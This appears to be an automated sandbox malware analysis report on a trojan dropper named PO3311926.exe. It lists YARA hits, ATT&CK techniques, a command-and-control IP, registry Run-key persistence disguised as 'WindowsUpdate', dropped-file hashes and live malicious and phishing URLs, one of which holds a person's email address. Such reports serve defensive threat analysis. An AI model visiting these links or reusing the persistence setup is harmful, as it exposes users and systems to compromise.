Source: Yara match	File source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.2166043970.0000000001832000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2160394335.000000000182A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1557524427.00000000017C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1916712063.0000000004046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1916641917.0000000001682000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1565296596.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1557460063.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1714503367.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2166138425.00000000041ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2160342151.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1702942543.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1703000356.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1565515689.0000000004098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1693784199.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1916546017.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1906750023.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1702531700.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2165918664.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1693739321.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1565342745.00000000017AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1916582807.0000000001665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1906792983.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1702562774.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2165964691.0000000001814000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_00612163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	8_2_00612163
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_00611B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	8_2_00611B61
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AE2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	20_2_00AE2163
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AE1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	20_2_00AE1B61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	2 Native API	1 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	21 Access Token Manipulation	11 Software Packing	NTDS	37 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	111 Registry Run Keys / Startup Folder	312 Process Injection	1 DLL Side-Loading	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 Masquerading	Cached Domain Credentials	111 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	111 Registry Run Keys / Startup Folder	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	312 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO3311926.exe	68%	ReversingLabs	Win32.Trojan.Leonem
PO3311926.exe	56%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	26%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	28%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe	26%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe	28%	Virustotal		Browse
C:\Users\user\AppData\Roaming\RegSvcs.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\RegSvcs.exe	0%	Virustotal		Browse
C:\Users\user\wrse\sdadbtvsh.bin	26%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\wrse\sdadbtvsh.bin	28%	Virustotal		Browse
C:\Users\user\wrse\sdadbtvsh.bin.exe	26%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\wrse\sdadbtvsh.bin.exe	28%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
102.165.14.26	0%	Avira URL Cloud	safe
102.165.14.26	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	142.250.191.196	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/async/ddljson?async=ntp:2	false		high
https://www.google.com/async/newtab_promos	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGKXUvbEGIjD-kgWdpW8hT-9hc2nj_b9H1bs6sOSvG1viHx2oR-H037B_HudVAHyts9ARK3nBSXsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGKXUvbEGIjDdp0aB_5C1gr2eixUtAMj4mBUQzkJ9vh0Q2d77njF6aqNILXZ84lvrwl1-Gwx1dfsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
102.165.14.26	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000000.1648993329.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe, 0000001A.00000000.1866878871.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe, 00000023.00000002.2210000278.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	false		high
https://www.autoitscript.com/autoit3/	PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
102.165.14.26	unknown	South Africa	61317	ASDETUKhttpwwwheficedcomGB	true
142.250.191.196	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.8

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1433216
Start date and time:	2024-04-29 11:34:32 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO3311926.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@56/58@2/4
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 183 Number of non-executed functions: 246
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.229.211.108, 142.250.190.35, 142.250.190.142, 142.251.178.84, 34.104.35.123
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 1036 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 2160 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 2940 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 3672 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 4692 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 5744 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 6444 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 6916 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:35:38	API Interceptor	1x Sleep call for process: PO3311926.exe modified
11:35:42	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\wrse\SDADBT~1.EXE C:\Users\user\wrse\nngqrvwq.xl
11:35:46	API Interceptor	1027x Sleep call for process: RegSvcs.exe modified
11:35:47	Task Scheduler	Run new task: RegSvcs path: C:\Users\user\AppData\Roaming\RegSvcs.exe
11:35:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs C:\Users\user\AppData\Roaming\RegSvcs.exe
11:36:00	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\wrse\SDADBT~1.EXE C:\Users\user\wrse\nngqrvwq.xl
11:36:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs C:\Users\user\AppData\Roaming\RegSvcs.exe
11:36:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\wrse\SDADBT~1.EXE C:\Users\user\wrse\nngqrvwq.xl

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	rlxLeu_22.dll	Get hash	malicious	Unknown	Browse
	Scan File_pdf.exe	Get hash	malicious	FormBook	Browse
	Scan307.exe	Get hash	malicious	FormBook	Browse
	rlxLeu_22.dll	Get hash	malicious	Unknown	Browse
	http://masriortho.com	Get hash	malicious	Unknown	Browse
	statement and invoices.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	https://qa0-sm-ing-prss-2s-jjyai.ondigitalocean.app/#alicia.blanchard@aub-sante.fr	Get hash	malicious	HTMLPhisher	Browse
	https://www.talakunchi.com	Get hash	malicious	Unknown	Browse
	https://htmlcoder001.github.io/it-1985-UniDent-Colgate/	Get hash	malicious	Unknown	Browse
	https://fat-doc.s3.us-east-2.amazonaws.com/Comprovativo_Abril_KDZlyr_26-04-2024_64.zip?=PGNPUKVOPEHCMOLUMNPIBIKXCKFBEBOPMVCSFREHAACJTZHQQDMNCHWFHRMVUUJNQSRQMTOUIHHAGQCFRPLAPBNDXXJPFJOFRPTBGREXQREVKZKSPGDEIIWPFNUPIKPWUBJRXBKAJOLWXREWZSKWGIZHRDXTZPNQBFBZOIVOHCUUZKSOIVSRKQSLE	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASDETUKhttpwwwheficedcomGB	http://masriortho.com	Get hash	malicious	Unknown	Browse	181.214.31.155
	spQm3NLQtH.elf	Get hash	malicious	Unknown	Browse	193.37.197.123
	RDFchOT4i0.exe	Get hash	malicious	Unknown	Browse	191.101.1.116
	https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSPyltUaWCsyFq200Ntb2JspVnELOGgvw66FVBJMc1CsMmns0_-2BOVhbrxcsvz9veeoLEglpD8RiEh0AaH1ow0Lk-2FKx9DGH2EA0fWhnrHZ-2FmlnIJ5UhAxXtDoOWXX-2FPyG5rVAl4UI7bgryXtRxONxX47M69Zs408-2BvnAL8-2FwQfC38J0vo-2BNPuXd9ZQRl3mVPkcpfDB8fFzO8k72NDbDigQEVVlq88Cbyd-2FspyzvoVJPR1h-2FbZ7QQ6McqmPE9-2BcpXmxMjtiMnlH5y7my6ciUJ8oawjrr8uTV2VFCUnRz-2BYajHpdlo-2BdijTTWoN6XIqzSzzn9raVdyCv6yrtMzJIVFFK229s6J0zoOHuRdvwd4zEdpENbxbzehqnKQ8Yk3LeuEYUlsDIufaiekHtd-2BWbkmha56OPiK-2BI-3D	Get hash	malicious	HTMLPhisher	Browse	45.85.146.171
	https://www.bing.com/////////////////////ck/a?!&&p=0533e94aab0b2a6eJmltdHM9MTcxMzQ4NDgwMCZpZ3VpZD0xNDE4NDZmNi1iZWY1LTY4NjUtMjQ0YS01MjkwYmYwZTY5ODQmaW5zaWQ9NTIyMA&ptn=3&ver=2&hsh=3&fclid=141846f6-bef5-6865-244a-5290bf0e6984&u=a1aHR0cHM6Ly9reDRrc3IuYXJ0aWNsZXdyaXRpbmdnZW5lcmF0b3IueHl6Lw#vds2aa29aYmRldmluc0B3ZS13b3JsZHdpZGUuY29t	Get hash	malicious	HTMLPhisher	Browse	45.66.153.74
	xzk9TKqNoI.elf	Get hash	malicious	Mirai	Browse	5.180.81.231
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	5.182.110.176
	tajma.x86-20240422-0535.elf	Get hash	malicious	Mirai, Okiru	Browse	181.214.235.73
	http://lumoleadership.com	Get hash	malicious	Unknown	Browse	45.150.67.235
	http://lumoleadership.com	Get hash	malicious	Unknown	Browse	45.150.67.235

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	Scan307.exe	Get hash	malicious	FormBook	Browse	23.206.229.226
	SWIFT.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	23.206.229.226
	http://masriortho.com	Get hash	malicious	Unknown	Browse	23.206.229.226
	https://qa0-sm-ing-prss-2s-jjyai.ondigitalocean.app/#alicia.blanchard@aub-sante.fr	Get hash	malicious	HTMLPhisher	Browse	23.206.229.226
	https://sdfsd.s3.bhs.cloud.ovh.net/v1/AUTH_8749f4abd4b14c57a9f85d6e4378c063/dsfdf/gfhfgh#cl/298587_smd/265/3571761/3180/201/26638	Get hash	malicious	Phisher	Browse	23.206.229.226
	mimicransomware_infected.exe	Get hash	malicious	Mimic	Browse	23.206.229.226
	7JJXhSsMRy.exe	Get hash	malicious	PureLog Stealer, RedLine, SectopRAT, Stealc, zgRAT	Browse	23.206.229.226
	qNbW6kNBAI.exe	Get hash	malicious	PureLog Stealer, RedLine, SectopRAT, Stealc, zgRAT	Browse	23.206.229.226
	a825b92f75bda1a0ab93970d92a09b91c04ea7cccae4c.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	23.206.229.226
	Khf0oNzz23.exe	Get hash	malicious	Mars Stealer, RedLine, SectopRAT, Stealc, Vidar	Browse	23.206.229.226
28a2c9bd18a11de089ef85a160da29e4	rlxLeu_22.dll	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50
	Scan File_pdf.exe	Get hash	malicious	FormBook	Browse	23.221.246.93 20.12.23.50
	Scan307.exe	Get hash	malicious	FormBook	Browse	23.221.246.93 20.12.23.50
	U6eEs0OrNA.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	23.221.246.93 20.12.23.50
	rlxLeu_22.dll	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50
	http://masriortho.com	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50
	statement and invoices.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	23.221.246.93 20.12.23.50
	https://qa0-sm-ing-prss-2s-jjyai.ondigitalocean.app/#alicia.blanchard@aub-sante.fr	Get hash	malicious	HTMLPhisher	Browse	23.221.246.93 20.12.23.50
	https://www.talakunchi.com	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50
	https://htmlcoder001.github.io/it-1985-UniDent-Colgate/	Get hash	malicious	Unknown	Browse	23.221.246.93 20.12.23.50

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe	Vessel Details.exe	Get hash	malicious	Remcos	Browse
	PAscChbUto.exe	Get hash	malicious	Remcos	Browse
	fGpaopkx0W.exe	Get hash	malicious	Remcos	Browse
	Final Shipping Samples and Lables.scr.exe	Get hash	malicious	Unknown	Browse
	RFQ_0103.exe	Get hash	malicious	Unknown	Browse
	doc2902.exe	Get hash	malicious	FormBook	Browse
	doc2902.exe	Get hash	malicious	FormBook	Browse
C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Vessel Details.exe	Get hash	malicious	Remcos	Browse
	PAscChbUto.exe	Get hash	malicious	Remcos	Browse
	fGpaopkx0W.exe	Get hash	malicious	Remcos	Browse
	Final Shipping Samples and Lables.scr.exe	Get hash	malicious	Unknown	Browse
	RFQ_0103.exe	Get hash	malicious	Unknown	Browse
	doc2902.exe	Get hash	malicious	FormBook	Browse
	doc2902.exe	Get hash	malicious	FormBook	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	142
Entropy (8bit):	5.090621108356562
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5:	8C0458BB9EA02D50565175E38D577E35
SHA1:	F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256:	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512:	804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\RarSFX0\aijs.docx

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.499830456903425
Encrypted:	false
SSDEEP:	12:ZvPW4AywqRWqrOGaUWPcjKGU7WufGk3BPydz7mVMmOl:ZvO4AyPWgOGbKLSufGk3QZ7Hm+
MD5:	9C20E4DBC8B06339684813411E0EBAE9
SHA1:	33576982CF29C18EF4E32A0B7E75981FD420656C
SHA-256:	6FEF2EE6CEABF623D208AEE66EE8A97FB381C0542106E0573E5F35FF15F929AE
SHA-512:	30559525DB0A8DA52AE117169C82FA6A81FCF1320207F04EB8090AC4D84C62630A1A1E81880A13BDA998F898A9E15C107E855CC8FA3FB0741D82570A01199F8C
Malicious:	false
Preview:	fxL2sfn147y8n3k8pvwl854e36W8v2ymc6t4N41K5I8f1..DateTimeConstants StructureConstants..FbMU7GFuNIP2U57uJEe4520GywIF9687371Lu7k44Fru36Lw2F..StructureConstants ToolTipConstants..g555Ux8yN4097E1vp8BjX5N42287268rwJhn2WW8ih6WxUFbX4556d79g67JvW4664307712X39uz12VC226vNQp285s3Zo6924g6JdlhCdiFGbd40L894B9684F60A69756u3532503M2A4pE..ColorConstants TreeViewConstants..9Fg529a..FileConstants FileConstants..upb868026PTA92850z5y458PPt0lnWW9Zb52b2975Iv6xLVX8S0i1Q9c5h8L5v87oF9919y37Us5T36j231rdStq4z4Q..UpDownConstants ColorConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\cqeg.bmp

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	578
Entropy (8bit):	5.470929431536943
Encrypted:	false
SSDEEP:	12:QmrVWRQ13GEhjNiTP9RAHcNDJMT5WUzMTdWNe/jeubmnB9u:Q4WRQ13GEBNijicNDJS7cdWYLeuC2
MD5:	6E0C9DF3739A1E85F2F4D0A7F9EB2CCB
SHA1:	662EB231AD68AC60CD49BFE70001693511F605FD
SHA-256:	305E8EF070FF770300A914B1CF5B1496966DF70189471F538BDC88FD6956204D
SHA-512:	8466D8335765CD7EE5189CA90BF3FD820CBFA2CDF1041370200A5C7C8F7856540798C7B83AE44299AD517DC83B79AABBEA172A90346D15EB9FC09449F6A3E16E
Malicious:	false
Preview:	32CK95RY0814hv941T7k4iDeF..FontConstants FileConstants..64V81Fy4y81413I3L5VD9Z8R281FOL93245K2w699i15A8VJWP729qU14121O4..TreeViewConstants StructureConstants..8l8b835bP14P09H5586985r91iv96zgie11ein93l52223N3A1lN4l3HDO7R2waLs23lWD1I079aL0aWAL45ir06838uk4o72K80RNN3Q6n6o30..BorderConstants FileConstants..967jjg6Z7NxnB8Of2244549aCW1751Z9wPl4C03955N9AhB9mTUPta6KYZKo8Y2886c851T78016928X3a749n2xdYL72m3gMim4cH6c243Ptx683g30o8HeHc613y0FV..BorderConstants GuiDateTimePicker..B659447925ju61F0nsx470ry35T8CAmK3UTd9Ot6H9ce5xcFF1W246k7025595g4c6i2t572Qc6..BorderConstants ButtonConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\ensfhqoc.dat

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	507
Entropy (8bit):	5.563974152435707
Encrypted:	false
SSDEEP:	12:lXVPiyMsfK8BPpSX2Qny/RHw64FaERiBoeUQXn8:HXi8va9nzla4iBNR8
MD5:	4780805307EC0CCA7AB5C03C0FE32B6A
SHA1:	CCBF8B62C820CA937CC16D2C9ED96284086F9DE6
SHA-256:	3CD1C08B7401ECA53AC3DEEDFC1102D9FF1AE21B028CA7E588CD20DDBD3EB447
SHA-512:	E1F016BF6DFD31579F98E007E6BBAD9D4552478D7A9CD99521E534C2A21BD4590263CA57E6DF1C65F958C7448B2F9D8C877AE9970FCB9CDD596FCD2F0BA06997
Malicious:	false
Preview:	7x4i39U1577T9c980g98v9S3m9846B290uk70Y163393RDZ4IQj1967w3LIH7b9011w561jM..FontConstants TreeViewConstants..4q4SrH1896X8r978v8J7r4jcLvGv556A7Vo8Vr3104cLVF1c074auW8o3z708Dsa490A5Qm0408ka30ey6x72zU58nyx8qF1233Cn5bp7wnq16g..StructureConstants FileConstants..5W91U6etd85cO1O75kq2opx91R3Nv45FN6HUF658652R4LUwn6zILeh6P75644mMAs8u091wcTk195618FKJ70Zg36H140MIhR..ButtonConstants UpDownConstants..VP3OmSU4GdSB863C9h6U54W285384k1GQ64b5Z8R0Kh273R7O6L1WF9Zn112FcUE7Y0d3m14gl11aT928jJ..ToolTipConstants ToolTipConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\nngqrvwq.xl

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	data
Category:	dropped
Size (bytes):	77764244
Entropy (8bit):	6.953358239636248
Encrypted:	false
SSDEEP:	98304:d3WyIsyX65fO/lWSP3c88U8OFoLI/D/S5E4xZ6x23CXOx5SVUkpS+8+a+QM9JHcN:T
MD5:	9ED200FBFBB5AD31F672F02841A6A5F0
SHA1:	B13CBC45CA0043F0D7B3404AEEFCC0F486578B99
SHA-256:	18DBA9188C29CB03FA1C641C96E92083D2D678A71A69C506692DFB7DFCB85058
SHA-512:	9599F7D024D507A7D88A5B9A4899EEAC3BE78E257EC86591B3FF8D588826C80C35D7C874078EC19489EA1EAC440538483E655777B3E6D540543A72741EE7E416
Malicious:	true
